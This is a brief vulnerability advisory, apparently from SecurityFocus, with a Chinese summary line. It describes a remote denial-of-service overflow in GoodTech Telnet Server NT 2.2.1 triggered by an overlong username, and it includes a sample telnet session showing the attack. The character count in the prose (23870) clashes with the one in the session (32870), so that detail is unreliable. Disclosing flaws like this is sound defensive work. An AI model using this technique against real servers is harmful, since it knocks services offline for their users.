GoodTech Telnet Server NT存在缓冲区溢出漏洞。远程攻击者借助一个长用户名可以引发拒绝服务。
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: firstname.lastname@example.org.
GoodTech Telnet Server NT 2.2.1 is vulnerable to a remote denial of service attack due to an unchecked buffer. If 23870 or more characters are entered at the username prompt, the software will crash.
GoodTech's Telnet Server 95/98 may also be vulnerable to this overflow.
$ telnet victimhost
Connected to victimhost.
Escape character is '^]'.
Welcome to GoodTech Telnet Server for Windows NT (V2.2) (Evaluation Copy)
(C) Copyright 1996-1999 GoodTech Systems, Inc.
Login username: (32870 characters)